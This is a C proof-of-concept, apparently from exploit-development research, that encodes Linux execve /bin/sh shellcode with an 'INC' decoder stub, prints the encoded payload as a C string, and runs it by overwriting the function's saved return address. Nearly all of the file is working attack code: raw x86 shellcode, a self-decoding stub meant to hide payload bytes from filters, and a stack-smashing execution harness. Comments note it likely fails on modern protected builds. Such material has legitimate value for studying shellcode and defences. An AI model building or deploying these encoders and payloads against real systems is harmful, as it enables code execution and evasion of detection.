/*
 * Proof-of-concept to test the decoder
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 *
 * INC Shellcode encoder
 * 
 */

void execute(char *  data);

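/*
 * Build the test payload for the INC decoder: subtract `size` from every
 * shellcode byte, patch the decoder's loop count, print the result as a C
 * string literal, then hand the buffer to execute().
 *
 * Returns EXIT_FAILURE if the payload does not fit the decoder's 8-bit
 * loop counter or the buffer cannot be allocated; otherwise 0 (reached
 * only if execute() returns).
 */
int main(void) {

  char decoder[] =
    // inc decoder
   "\xeb\x0b"	//                   jmp    d <label3>
   "\x5e"                  //    popl   %esi
   "\x6a\x00"              //     pushl  $0x0
   "\x59"                  //    popl   %ecx
   "\xfe\x06"                   // incb   (%esi)
   "\x46"                  //    incl   %esi
   "\xe2\xfb"               //    loopl  6 <label2>
   "\xeb\x05"               //    jmp    12 <label4>
   "\xe8\xf0\xff\xff\xff"; //          calll  2 <label1>

  /* Linux execve /bin/sh shellcode */
  char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

  /* Lengths come from the array sizes, not strlen(): the decoder literal
   * carries an embedded 0x00 (the imm8 of "pushl $0x0") that strlen() would
   * stop at, and the encoded shellcode may legitimately contain 0x00. */
  const size_t dec_len = sizeof decoder - 1;
  const size_t sc_len = sizeof shellcode - 1;
  const int size = 1;   /* value subtracted from every payload byte; the decoder adds it back */
  int l = 15;           /* column counter for the hex dump, 15 bytes per output line */

  /* Encode: every byte is decremented by `size`. */
  for (size_t i = 0; i < sc_len; i++) {
    shellcode[i] -= size;
  }

  /* The decoder's loop count is the imm8 of "pushl $0x0", at decoder[4]
   * for decoder.s (the decoder.S variant kept it at offset 6).  A single
   * byte cannot hold a larger count, so refuse instead of wrapping. */
  if (sc_len > 0xff) {
    fprintf(stderr, "shellcode too long for the 8-bit loop counter (%zu bytes)\n", sc_len);
    return EXIT_FAILURE;
  }
  decoder[4] += (char)sc_len;

  /* decoder followed by the encoded shellcode, plus one byte so the buffer
   * stays NUL-terminated.  calloc() gives defined contents; the original
   * strcat() onto uninitialised malloc() memory was undefined behaviour. */
  const size_t total = dec_len + sc_len;
  char *end = calloc(total + 1, 1);
  if (end == NULL) {
    perror("calloc");
    return EXIT_FAILURE;
  }
  memcpy(end, decoder, dec_len);
  memcpy(end + dec_len, shellcode, sc_len);

  printf("\nDecoder: %zu Shellcode: %zu Result %zu\n", dec_len, sc_len, total);

  printf("\n\nchar shellcode[] =\n");

  /* Hex dump as a C string literal, 15 bytes per line. */
  for (size_t i = 0; i < total; ++i) {
    if (l >= 15) {
      if (i) printf("\"\n");
      printf("\t\"");
      l = 0;
    }
    ++l;
    printf("\\x%02x", ((unsigned char *)end)[i]);
  }

  /* Make sure the dump is out before control is handed to execute(). */
  fflush(stdout);

  printf("\";\n");

  /* execute() tries to redirect its own return into `end` (see its
   * definition); the buffer is released only if control comes back. */
  execute(end);
  free(end);
  return 0;
}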


/*
 * Overwrite what this frame assumes to be its own saved return address
 * with `data`, so that returning from execute() lands in the buffer.
 *
 * This depends on an unspecified stack layout: `(int *)&ret + 2` is taken
 * to be the slot holding the return address (local, saved frame pointer,
 * return address -- i386 with frame pointers and no stack protector), and
 * the pointer is truncated to `int`, so it is only meaningful on a 32-bit
 * target.  Writing outside the `ret` object is undefined behaviour; on a
 * modern build (64-bit, -fstack-protector, non-executable heap) this is
 * expected to crash or be a no-op rather than run the payload.  Kept as
 * the historical proof-of-concept harness only.
 */
void execute(char *data) {
  
  int *ret;
  ret = (int *)&ret + 2;   /* assumed offset of the saved return address; layout-dependent */
  (*ret) = (int)data;      /* pointer -> int truncates on LP64; only valid for the i386 PoC */
  
}




